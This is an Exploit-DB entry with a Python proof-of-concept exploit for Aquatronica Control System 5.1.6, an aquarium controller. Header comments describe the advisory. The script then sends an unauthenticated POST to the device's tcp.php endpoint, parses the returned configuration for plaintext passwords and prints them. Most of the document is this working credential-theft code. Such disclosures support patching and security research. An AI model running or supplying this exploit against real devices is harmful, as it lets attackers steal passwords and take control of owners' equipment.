Aquatronica Control System 5.1.6 - Information Disclosure

EDB-ID:

52028

CVE:

N/A




Platform:

Hardware

Date:

2024-05-31


#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
#
#
# Vendor: Aquatronica s.r.l.
# Product web page: https://www.aquatronica.com
# Affected version: Firmware: 5.1.6
#                   Web: 2.0
#
# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
# to use, allowing you to control all the electrical devices in
# an aquarium and to monitor all their parameters; it can be used
# for soft water aquariums, salt water aquariums or both simultaneously.
#
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
# to unauthenticated attackers over the network. This vulnerability
# allows remote attackers to send a POST request which can reveal
# sensitive configuration information, including plaintext passwords.
# This can lead to unauthorized access and control over the aquarium
# controller, compromising its security and potentially allowing attackers
# to manipulate its settings.
#
# Tested on: Apache/2.0.54 (Unix)
#            PHP/5.4.17
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2024-5824
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
#
#
# 04.05.2024
#

import requests, html, re, sys, time
from urllib.parse import unquote

program     = "TCP"
command     = "ws_get_network_cfg"
function_id = "TCP_XML_REQUEST"

print("""
      _________         .    .
     (..       \_    ,  |\  /|
      \       O  \  /|  \ \/ /
       \______    \/ |   \  / 
          vvvv\    \ |   /  |
          \^^^^  ==   \_/   |
           `\_   ===    \.  |
           / /\_   \ /      |
           |/   \_  \|      /
___ ______________\________/________aquatronica_0day___
  | |
  | |
  | |
""")

if len(sys.argv) != 2:
    print("Usage: python aqua.py <ip:port>")
    sys.exit(1)

ip = sys.argv[1]
url = f"http://{ip}/{program.lower()}.php"

post_data = {'function_id' : function_id.lower(),
             'command'     :     command.upper()}

r = requests.post(url, data=post_data)

if r.status_code == 200:
    r_d = unquote(r.text)
    f_d_r = html.unescape(r_d)
    regex = r'pwd="([^"]+)"'
    rain = re.findall(regex, f_d_r)

    for drops in rain:
        print(' ',drops)
        time.sleep(0.5)
else:
    print(f"Dry season! {r.status_code}")